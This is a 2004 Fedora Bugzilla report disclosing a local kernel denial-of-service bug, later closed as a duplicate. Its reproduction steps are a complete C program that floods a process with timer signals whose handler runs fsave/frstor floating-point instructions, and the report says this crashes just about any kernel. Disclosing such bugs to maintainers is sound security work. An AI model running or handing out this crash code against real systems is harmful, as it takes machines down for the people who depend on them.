Bug 125940

Summary: Local kernel denial of service exploit
Product: [Fedora] Fedora
Reporter: Nils O. Selåsdal <nos>
Component: kernel
Assignee: Arjan van de Ven <arjanv>
Status: CLOSED DUPLICATE
QA Contact: Brian Brock <bbrock>
Severity: medium
Priority: medium
Version: 2
Keywords: Security
Hardware: All
OS: Linux
Doc Type: Bug Fix
Last Closed: 2006-02-21 19:04:04 UTC

Description Nils O. Selåsdal 2004-06-14 13:21:48 UTC
Description of problem:
Seems there is a local kernel denial of service exploit in just about
any kernel out there.
Info is at http://linuxreviews.org/news/2004-06-11_kernel_crash/index.html
Fedora Core should be updated. RHEL should be investigated.


Version-Release number of selected component (if applicable):


How reproducible:
Always

Steps to Reproduce:
1. compile and run:
#include <sys/time.h>
#include <signal.h>
#include <unistd.h>

/* Runs on every SIGALRM: saves the x87 FPU state into a user buffer
 * with fsave, then reloads that image with frstor before returning
 * to the interrupted code. */
static void Handler(int ignore)
{
    char fpubuf[108];   /* an fsave image is 108 bytes */
    /* fsave writes the buffer, so it is an output operand */
    __asm__ __volatile__ ("fsave %0\n" : "=m"(fpubuf));
    write(2, "*", 1);
    /* frstor reads the buffer back */
    __asm__ __volatile__ ("frstor %0\n" : : "m"(fpubuf));
}

int main(int argc, char *argv[])
{
    struct itimerval spec;

    signal(SIGALRM, Handler);

    /* Fire SIGALRM 100 us from now and every 100 us after that,
     * so the handler keeps interrupting the process. */
    spec.it_interval.tv_sec = 0;
    spec.it_interval.tv_usec = 100;
    spec.it_value.tv_sec = 0;
    spec.it_value.tv_usec = 100;
    setitimer(ITIMER_REAL, &spec, NULL);

    /* Busy loop; the timer signals land here. */
    while (1)
        write(1, ".", 1);

    return 0;
}


Additional info:
Appears that the kernel doesn't handle floating point exceptions in
signal handlers.

Comment 1 Dave Jones 2004-06-14 16:12:55 UTC

*** This bug has been marked as a duplicate of 125912 ***

Comment 2 Red Hat Bugzilla 2006-02-21 19:04:04 UTC
Changed to 'CLOSED' state since 'RESOLVED' has been deprecated.